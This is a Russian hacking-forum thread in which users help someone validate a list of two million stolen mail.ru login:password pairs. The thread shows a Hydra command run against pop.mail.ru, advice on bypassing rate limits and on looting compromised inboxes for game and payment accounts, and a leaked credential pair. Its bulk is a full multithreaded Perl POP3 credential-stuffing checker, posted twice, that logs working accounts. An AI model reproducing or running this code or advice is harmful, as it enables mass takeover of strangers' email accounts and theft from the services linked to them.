Форум АНТИЧАТ - Чем прочекать 2кк mail.ru?

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Уязвимости Mail-сервис (https://forum.antichat.xyz/forumdisplay.php?f=14)

- - Чем прочекать 2кк mail.ru? (https://forum.antichat.xyz/showthread.php?t=403248)

Сабж.

Есть 2кк e-mail'ов на mail.ru. Чем их можно прочекать?

Чем бы не пытался - срабатывает защита, и после 1000 попыток всё летит в БЭД.

Может есть какой-нить брут многопоточный с проксями?

Вам проверить пары логин:пароль или только существование аккаунтов?

Гидру ту же самую попробуйте.

Цитата:

Сообщение от madhatter

madhatter said:
Вам проверить пары логин:пароль или только существование аккаунтов?
Гидру ту же самую попробуйте.

Проверить login;pass

upd: гидра только под UNIX?

Цитата:

Сообщение от Dr.Money

Dr.Money said:
Проверить login;pass
upd: гидра только под UNIX?

Вы минимум третий человек, который за последние несколько дней спрашивает об этом. Идеологически - да. Может быть, они таки сделали какой-никакой порт на окна, я не знаю. Энивей, kali вам в помощь. Скачал -> записал -> запустил. А заодно можете рассмотреть на местный сборник актуальных брутов, наверняка там есть что-нибудь почто-специфичное.

Но я бы все же рекомендовал вам заказать именно чекер, а не брут, и именно для mail.ru. Возможно, на веброжу. Если повезет - капча будет только после значительного количества невалидных mailass, и чекать можно будет хоть с одного айпи все 200k.

Цитата:

Сообщение от madhatter

madhatter said:
Вы минимум третий человек, который за последние несколько дней спрашивает об этом. Идеологически - да. Может быть, они таки сделали какой-никакой порт на окна, я не знаю. Энивей, kali вам в помощь. Скачал -> записал -> запустил. А заодно можете рассмотреть на местный сборник актуальных брутов, наверняка там есть что-нибудь почто-специфичное.
Но я бы все же рекомендовал вам заказать именно чекер, а не брут, и именно для mail.ru. Возможно, на веброжу. Если повезет - капча будет только после значительного количества невалидных mail
ass, и чекать можно будет хоть с одного айпи все 200k.

Пробовал более 10 чекеров, и заканчивается их работоспособность после первой тысячи loginass

Гидра ругается:

Код:

Code:

C:\Users\admin>E:\download\hydra-7.3-windows\hydra-7.3\hydra.exe -C E:/2kk.tx

t -o E:/log.txt -t 5 pop.mail.ru pop3

Hydra v7.3 (c)2012 by van Hauser/THC & David Maciejak - for legal purposes only



Hydra (http://www.thc.org/thc-hydra) starting at 2014-01-06 10:03:51

cygwin warning:

  MS-DOS style path detected: E:/2kk.txt

  Preferred POSIX equivalent is: /cygdrive/e/2kk.txt

  CYGWIN environment variable option "nodosfilewarning" turns off this warning.

  Consult the user's guide for more details about POSIX paths:

    http://cygwin.com/cygwin-ug-net/using.html#using-pathnames

[ERROR] invalid line in colon file (-C), missing colon in line: kelly_cutie_gurl

@hotmail.comreineaerold



C:\Users\admin>

И строк не 200к, а 2000к (2 миллиона)

Гидра - хня, пробуй медузу.

Цитата:

Сообщение от None

[ERROR] invalid line in colon file (-C), missing colon in line: kelly_cutie_gurl
@hotmail.comreineaerold

А вы английский знаете? А про онлайн-переводчики слышали? Давайте, я вам переведу:

Цитата:

Сообщение от None

Неправильная входная строка в файле логин:пароль (-С), отсутствует двоеточие в строке: kelly_cutie_gurl@hotmail.comreineaerold

После прочтения сообщения об ошибке здравый смысл подсказывает найти эту строку и вставить недостающее двоеточие: kelly_cutie_gurl@hotmail.com:reineaerold

Вам бы базу сначала проверить на правильность формата. А заодно собрать статистику по доменам, посколько почему-то мне думается что упомянутый hotmail.com не принадлежит mail.ru

Цитата:

Сообщение от madhatter

madhatter said:
А вы английский знаете? А про онлайн-переводчики слышали? Давайте, я вам переведу:
После прочтения сообщения об ошибке здравый смысл подсказывает найти эту строку и вставить недостающее двоеточие: kelly_cutie_gurl@hotmail.com:reineaerold
Вам бы базу сначала проверить на правильность формата. А заодно собрать статистику по доменам, посколько почему-то мне думается что упомянутый hotmail.com не принадлежит mail.ru

Не сообразил. Спасибо, помогло.

А в "-o указанный_файл.txt" пишутся гуды?

Цитата:

Сообщение от Dr.Money

Dr.Money said:
Не сообразил. Спасибо, помогло.
А в "-o указанный_файл.txt" пишутся гуды?

Согласно линуксовой доке - да. Весьма вероятно, в винде ключи не меняли.

Хотите, чекер базы на валидность со статистикой напишу?

Цитата:

Сообщение от madhatter

madhatter said:
Согласно линуксовой доке - да. Весьма вероятно, в винде ключи не меняли.
Хотите, чекер базы на валидность со статистикой напишу?

Нет, пока не нужно, но спасибо.

Ещё другой вопрос: если все содержимые в -o e-mail'ы уже заблокированы за рассылку спама, и для их реанимации необходимо сменить пароль и указать телефон.

Что с такими e-mail'ами вообще можно сделать?

Цитата:

Сообщение от Dr.Money

Dr.Money said:
Нет, пока не нужно, но спасибо.
Ещё другой вопрос: если все содержимые в -o e-mail'ы уже заблокированы за рассылку спама, и для их реанимации необходимо сменить пароль и указать телефон.
Что с такими e-mail'ами вообще можно сделать?

Зависит от сервиса и жесткости блокировки. Если аккаунты не авторег и есть доступ к инбоксу: можете потрошить по аккаунтам всяких игрулек, платежек и прочего. Была где-то даже партнерка на эту тему. Я бы просто ради интереса слил с таких все отправленные и посмотрел бы на тему паролей и прочего.

Цитата:

Сообщение от madhatter

madhatter said:
Зависит от сервиса и жесткости блокировки.

В первом посте написано mail.ru, у них есть доступ в инбокс.

Цитата:

Сообщение от madhatter

madhatter said:
Если аккаунты не авторег и есть доступ к инбоксу: можете потрошить по аккаунтам всяких игрулек, платежек и прочего.

Можно еще ретривить аккаунты нужных сайтов, зареганные на это мыло.

smtp/pop+socks. Писал как - то под свои нужды подобное

Цитата:

Сообщение от M_script

M_script said:
В первом посте написано mail.ru, у них есть доступ в инбокс.

Цитата:

Сообщение от None

в строке: kelly_cutie_gurl@hotmail.comreineaerold почему-то мне думается что упомянутый hotmail.com не принадлежит mail.ru

Цитата:

Сообщение от None

Можно еще ретривить аккаунты нужных сайтов, зареганные на это мыло.

Цитата:

Сообщение от None

можете потрошить по аккаунтам всяких игрулек, платежек и прочего

Рестор паролей в данном контексте подходит под "потрошить"

У Дикса есть софт для чека mail.ru (есть многопоточная)

советую вам к нему обратиться.

Прочекать смысле на валидность ? если да то у меня завалялся чекер на perl очень шустрый без прокси, очень давно где то его брал уже не помню и автора тоже не помню.

У меня чекает в 300 потоков максимум, 1000 аков в за 7 секунд.

Когда сижу с usb modema то ставлю в 50 потоков и шустро работает и гуды не пропускает, вот сам код:

Код:

Code:

use warnings;

use strict;



use threads;

use threads::shared;



use IO::Socket;

use IO::Socket::SSL;



use Fcntl ':flock';



### Настройки



my $accounts_file = 'ac.txt'; # Файл с аккаунтами

my $accounts_delimiter = ':'; # Разделитель логина и пароля

my $good_file = 'good.txt';

my $bad_file = 'bad.txt';

my $log_bad = 1;

my $timeout = 60;

my $threads_count = 10; # Количество потоков



### ---------



my %servers = (

'gmail.com' => {

'port' => 995, 

'ssl' => 1,

'login_email' => 1

},

'hotmail.com' => {

'host' => 'pop3.live.com', 

'port' => 995, 

'ssl' => 1,

'login_email' => 1

},

'yahoo.com' => {

'host' => 'plus.pop.mail.yahoo.com',

'port' => 995, 

'ssl' => 1

},

'aol.com' => {

'port' => 995, 

'ssl' => 1,

'login_email' => 1

}

);



my %statictis : shared = ('good' => 0, 'bad' => 0, 'error' => 0);

my @threads = ();



$| = 1;



my @accounts : shared;

(open FH, ';

close FH;



open FH, '>', $good_file;

close FH;



if ($log_bad) {

open FH, '>', $bad_file;

close FH;

}



sub thread_print {

my ($str) = "@_ [thread ".threads->tid()."]";

$str .= " " x (78 - length $str) if length $str list() + 1)."]\r";

}



sub check_account {

while (1) {

last if !@accounts;

my $account = lc shift @accounts;

chomp $account;

if ($account =~ /([^@]+)@([^$accounts_delimiter]+)$accounts_delimiter(.+)/) {

my ($login, $host, $password) = ($1, $2, $3);

my $r_login = $login;

my $sock;        

if ($servers{$host}) {

$r_login = "$login\@$host" if ${$servers{$host}}{'login_email'};

if (${$servers{$host}}{'ssl'}) {

eval { $sock = IO::Socket::SSL->new(PeerAddr => ((${$servers{$host}}{'host'}) ? ${$servers{$host}}{'host'} : "pop.$host"), Proto => 'tcp', PeerPort => ((${$servers{$host}}{'port'}) ? ${$servers{$host}}{'port'} : 110), Timeout => $timeout); };

} else {

eval { $sock = IO::Socket::INET->new(PeerAddr => ((${$servers{$host}}{'host'}) ? ${$servers{$host}}{'host'} : "pop.$host"), Proto => 'tcp', PeerPort => ((${$servers{$host}}{'port'}) ? ${$servers{$host}}{'port'} : 110), Timeout => $timeout); };

}

} else {

eval{ $sock = IO::Socket::INET->new(PeerAddr => "pop.$host", Proto => 'tcp', PeerPort => 110, Timeout => $timeout);        };

}

if ($sock) {

$sock->autoflush(1);

my $answ;

$answ = ;

my $bad = 1; 

if ($answ && substr($answ, 0, 1) eq '+') { 

print $sock "USER $r_login\n"; 

$answ = ;

if ($answ && substr($answ, 0, 1) eq '+') { 

print $sock "PASS $password\n";

$answ = ;

if ($answ && substr($answ, 0, 1) eq '+') {

print $sock "QUIT\n"; 

close $sock;

$bad = 0;

thread_print "[+] $login\@$host$accounts_delimiter$password"; 

{ lock %statictis; $statictis{'good'}++; } 

open FH, '>>', $good_file;

flock FH, LOCK_EX;

print FH "$login\@$host$accounts_delimiter$password\n";

flock FH, LOCK_UN;

close FH;

} elsif ($answ && $answ =~ /SYS\/PERM/) {

$bad = 0;

{ lock %statictis; $statictis{'error'}++; } 

thread_print "[~] $login\@$host$accounts_delimiter$password"; 

}

}

}

if ($bad) {

thread_print "[-] $login\@$host$accounts_delimiter$password"; 

{ lock %statictis; $statictis{'bad'}++; } 

if ($log_bad) {

open FH, '>>', $bad_file;

flock FH, LOCK_EX;

print FH "$login\@$host$accounts_delimiter$password\n";

flock FH, LOCK_UN;

close FH;

}

}

} else {

{ lock %statictis; $statictis{'error'}++; } 

thread_print "[E] $login\@$host$accounts_delimiter$password #$?: $!";

}

}

}

threads->exit->detach;

}



$threads_count = $#accounts if $#accounts create(\&check_account) for 0..$threads_count - 1;

$_->join for @threads;

my $str;

$str .= "[ $_ - $statictis{$_} ]" for keys %statictis;

Я им чекнул 500 тысяч акков за час в 300 потоков

Платный онлайн чеккер. Не?

а зачем платный ?

Цитата:

Сообщение от Serrg

Serrg said:
Прочекать смысле на валидность ? если да то у меня завалялся чекер на perl очень шустрый без прокси, очень давно где то его брал уже не помню и автора тоже не помню.
У меня чекает в 300 потоков максимум, 1000 аков в за 7 секунд.
Когда сижу с usb modema то ставлю в 50 потоков и шустро работает и гуды не пропускает, вот сам код:

Код:

Code:

use warnings;

use strict;



use threads;

use threads::shared;



use IO::Socket;

use IO::Socket::SSL;



use Fcntl ':flock';



### Настройки



my $accounts_file = 'ac.txt'; # Файл с аккаунтами

my $accounts_delimiter = ':'; # Разделитель логина и пароля

my $good_file = 'good.txt';

my $bad_file = 'bad.txt';

my $log_bad = 1;

my $timeout = 60;

my $threads_count = 10; # Количество потоков



### ---------



my %servers = (

'gmail.com' => {

'port' => 995, 

'ssl' => 1,

'login_email' => 1

},

'hotmail.com' => {

'host' => 'pop3.live.com', 

'port' => 995, 

'ssl' => 1,

'login_email' => 1

},

'yahoo.com' => {

'host' => 'plus.pop.mail.yahoo.com',

'port' => 995, 

'ssl' => 1

},

'aol.com' => {

'port' => 995, 

'ssl' => 1,

'login_email' => 1

}

);



my %statictis : shared = ('good' => 0, 'bad' => 0, 'error' => 0);

my @threads = ();



$| = 1;



my @accounts : shared;

(open FH, ';

close FH;



open FH, '>', $good_file;

close FH;



if ($log_bad) {

open FH, '>', $bad_file;

close FH;

}



sub thread_print {

my ($str) = "@_ [thread ".threads->tid()."]";

$str .= " " x (78 - length $str) if length $str list() + 1)."]\r";

}



sub check_account {

while (1) {

last if !@accounts;

my $account = lc shift @accounts;

chomp $account;

if ($account =~ /([^@]+)@([^$accounts_delimiter]+)$accounts_delimiter(.+)/) {

my ($login, $host, $password) = ($1, $2, $3);

my $r_login = $login;

my $sock;        

if ($servers{$host}) {

$r_login = "$login\@$host" if ${$servers{$host}}{'login_email'};

if (${$servers{$host}}{'ssl'}) {

eval { $sock = IO::Socket::SSL->new(PeerAddr => ((${$servers{$host}}{'host'}) ? ${$servers{$host}}{'host'} : "pop.$host"), Proto => 'tcp', PeerPort => ((${$servers{$host}}{'port'}) ? ${$servers{$host}}{'port'} : 110), Timeout => $timeout); };

} else {

eval { $sock = IO::Socket::INET->new(PeerAddr => ((${$servers{$host}}{'host'}) ? ${$servers{$host}}{'host'} : "pop.$host"), Proto => 'tcp', PeerPort => ((${$servers{$host}}{'port'}) ? ${$servers{$host}}{'port'} : 110), Timeout => $timeout); };

}

} else {

eval{ $sock = IO::Socket::INET->new(PeerAddr => "pop.$host", Proto => 'tcp', PeerPort => 110, Timeout => $timeout);        };

}

if ($sock) {

$sock->autoflush(1);

my $answ;

$answ = ;

my $bad = 1; 

if ($answ && substr($answ, 0, 1) eq '+') { 

print $sock "USER $r_login\n"; 

$answ = ;

if ($answ && substr($answ, 0, 1) eq '+') { 

print $sock "PASS $password\n";

$answ = ;

if ($answ && substr($answ, 0, 1) eq '+') {

print $sock "QUIT\n"; 

close $sock;

$bad = 0;

thread_print "[+] $login\@$host$accounts_delimiter$password"; 

{ lock %statictis; $statictis{'good'}++; } 

open FH, '>>', $good_file;

flock FH, LOCK_EX;

print FH "$login\@$host$accounts_delimiter$password\n";

flock FH, LOCK_UN;

close FH;

} elsif ($answ && $answ =~ /SYS\/PERM/) {

$bad = 0;

{ lock %statictis; $statictis{'error'}++; } 

thread_print "[~] $login\@$host$accounts_delimiter$password"; 

}

}

}

if ($bad) {

thread_print "[-] $login\@$host$accounts_delimiter$password"; 

{ lock %statictis; $statictis{'bad'}++; } 

if ($log_bad) {

open FH, '>>', $bad_file;

flock FH, LOCK_EX;

print FH "$login\@$host$accounts_delimiter$password\n";

flock FH, LOCK_UN;

close FH;

}

}

} else {

{ lock %statictis; $statictis{'error'}++; } 

thread_print "[E] $login\@$host$accounts_delimiter$password #$?: $!";

}

}

}

threads->exit->detach;

}



$threads_count = $#accounts if $#accounts create(\&check_account) for 0..$threads_count - 1;

$_->join for @threads;

my $str;

$str .= "[ $_ - $statictis{$_} ]" for keys %statictis;

Я им чекнул 500 тысяч акков за час в 300 потоков

Как ты его в 300 потоков запускал?

У меня выше 50 Perl закрывается с ошибкой. С чем это может быть связано?

Загрузка процессора и памяти сразу под 100% и вылетает.

У меня интернет через usb modem megafon симка билайн интернет скорость на выходе 3.6 мегабит, соответственно скорость загрузки ~360 kb/s скорость отправки примерно ~100 kb/s, 4,00 mb (ОЗУ) amd phenom 4 ядра 2.6 герц.

Ничего необычного вроде, сначала ставил не более 10 потоков так как не знал и интернет был маленький dial, это было примерно года 2 назад, а теперь ~200-300 потоков ставлю когда надо много проверить много значит от 100 тысяч и всё окей. А так и в 100 потоков неплохо проверяет.) Все от инета зависит. Кстати разделитель ставить надо ":"

Бывает еще такое что когда выкидывает с ошибкой, заново просто открываешь и уже нормально гонит и ошибок нету )

http://s2.ipicture.ru/uploads/201402...s/EtNr0k2Y.jpg

Бывает такой что интернет отключается )) в 250 потоков если, ну это usb modem что с него взять ))